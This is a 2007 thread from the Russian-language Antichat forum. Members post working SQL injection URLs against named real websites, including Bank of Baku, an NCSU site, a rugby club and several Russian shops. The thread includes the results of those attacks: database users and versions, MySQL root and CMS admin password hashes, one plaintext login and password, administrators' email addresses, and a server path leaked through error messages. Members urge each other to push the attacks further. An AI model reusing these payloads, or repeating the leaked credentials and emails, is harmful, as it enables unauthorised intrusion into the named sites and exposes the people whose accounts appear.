ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
07.12.2007, 17:32
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
www.totalgameplay.com
Код:
http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,version(),5,user(),7,8,database(),10,11/*
4.1.22-standard-log
tgp_sysclie@localhost
tgp_gamedb
_______________________________________
При запросе
Код:
http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat(table_schema,0x3a,table_name),10,11+from+information_schema.columns+where+column_name=0x70617373776F7264/*
Получается
Код:
SELECT command denied to user 'tgp_sysclie'@'localhost' for table 'columns'
Попробуйте ктонибудь дораскрутить...
www.kursor-trans.com
Код:
http://www.kursor-trans.com/news.php?id=-1+union+select+1,2,user(),version()/*
4.1.22-standard
kursor_alex@localhost
Последний раз редактировалось Mike 007; 07.12.2007 в 18:11..
|
|
|
07.12.2007, 18:19
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Bank Of Baku
http://www.bankofbaku.com/rus/news.php?id=-15'+union+select+1,2,load_file('/tmp/123.php'),4,5,6,7,8,9,10,11,12,13,14,15/*
|
|
|
|
07.12.2007, 18:24
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
Код HTML:
http://trizland.ru/task.php?id=9999
Код HTML:
http://trizland.ru/task.php?id=9999+union+select+0,1,concat(USER(),0x3a,VERSION(),0x3a,DATABASE(),0x3a),3,4,5,6,7,8/*
USER:bin17www-sql@way.hc.ru
VERSION:4.1.18
DATABASE:bin17www |
|
|
|
07.12.2007, 18:30
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Сообщение от Spyder
Bank Of Baku
Немнога доработал
Код:
http://www.bankofbaku.com/rus/news.php?id=-15'+union+select+1,2,load_file('/tmp/123.php'),4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x2F,user,password)+from+mysql.user/*
admins
root/60f57c4813f45b5f
orxanx/3d43b7262348c8c8
|
|
|
|
07.12.2007, 18:25
|
|
Участник форума
Регистрация: 06.07.2005
Сообщений: 115
Провел на форуме:
959535
Репутация:
40
|
|
www.crim.ncsu.edu/
Код:
http://www.crim.ncsu.edu/project_detailed.php?id=-1+union+select+1,2,3,concat(user_login,0x3a,user_pass),5,6,7,8,9,1,2,3,4,5,6,7,8+from+wp_users+limit+0,1/*
admin:75bb40f591c0db371aba50f65741d73f
|
|
|
|
07.12.2007, 19:19
|
|
Участник форума
Регистрация: 03.09.2005
Сообщений: 123
Провел на форуме:
1896022
Репутация:
259
|
|
Код:
http://www.seacoastrugby.org/news.php?id=-123+union+select+1,2,concat_ws(char(58,58),user(),database(),version()),4/*
rugby@localhost::seacoast::5.0.27
Код:
http://www.seacoastrugby.org/news.php?id=-123+union+select+1,2,concat_ws(char(58,58),username,email,password),4+from+mos_users/*
admin::hostmaster@me-and-e.com::f749b2d0d046218a980aa301950d6aa7 |
|
|
|
07.12.2007, 19:26
|
|
Познающий
Регистрация: 04.04.2007
Сообщений: 54
Провел на форуме:
189215
Репутация:
86
|
|
Код:
http://socstudikantiani.fls.unipi.it/index.php?id=-1+union+select+1,2,3,user(),5,version(),7,8,9,10/*
Код:
http://rba-optima.com/index.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*
Что за??
Код:
http://www.dualtime.ru/category.php?id=-1+union+select+1,2,3/*
и
Код:
http://www.mywatches.ru/category.php?id=-1+union+select+1,2,3/*
и
Код:
http://www.atlantic-time.ru/category.php?id=-1+union+select+1,2,3/*
что за?
________________________________________
www.korsteklobor.ru
Код:
http://www.korsteklobor.ru/category.php?id=-1+union+select+1,concat(login,0x3a,password),3+from+user/*
тут всё сделал =)
логин: korsteklobor
пасс: krstklbr
Последний раз редактировалось Mike 007; 07.12.2007 в 20:04..
|
|
|
|
07.12.2007, 20:42
|
|
Banned
Регистрация: 19.10.2007
Сообщений: 152
Провел на форуме:
557623
Репутация:
415
|
|
МАКС
http://www.aviasalon.com
SQL-инъекция содержится в форме поиска
http://www.aviasalon.com/search.php?search_string=mig29"
Двойная кавычка вызывает ошибку в SQL-запросе, что даёт возможность узнать установочный путь скрипта
/home/aviasalon.com/data/htdocs/modules/mod_search.php ,
а также увидеть текст нескольких SQL-запросов. Так, можно получить информацию об именах некоторых таблиц и их полях.
Таблица______________Поля
engine_page: id,title,menu_id,content,keywords,description,stat us
list_param_value: value, item_id
list_item: id, title, alias, type_id
list_type: alias, id, prefix, suffix, title
data_news_item: title, alias, content, anons, topic_id
data_news_topic: alias, id
data_expo_company: title, alias, about, contacts
Запрос с одинарной кавычкой вызовет ошибку в регулярном выражении, раскрыв путь скрипта на сервере (см. выше)
http://www.aviasalon.com/search.php?search_string=mig29'
|
|
|
|
07.12.2007, 22:02
|
|
Участник форума
Регистрация: 28.12.2006
Сообщений: 111
Провел на форуме:
500695
Репутация:
524
|
|
Для Myke007
Усердней!!!!!!
Код:
http://www.totalgameplay.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,username,psw),10,11+from+login+limit+0,1/*
Поля : |
|
|
|
07.12.2007, 22:31
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://www.futureplay.org/news.php?id=999+union+select+1,login,3,user_password,5,6,7+from+user/*
Admins Password eMail
dloosemore /e8a59ea2c530174b8f60562d05a4403f /Deborah.Loosemore@algomau.ca
praycroft /b35c7298864f797f41e7b9da8781ed63 /raycroft@algomau.ca
picto_admin /0ef2057aa44ce08666f6a5876bf8da19 /info@pictographics.com |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?522679){kind=avatar}
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?522940){kind=avatar}
Комбинированный вид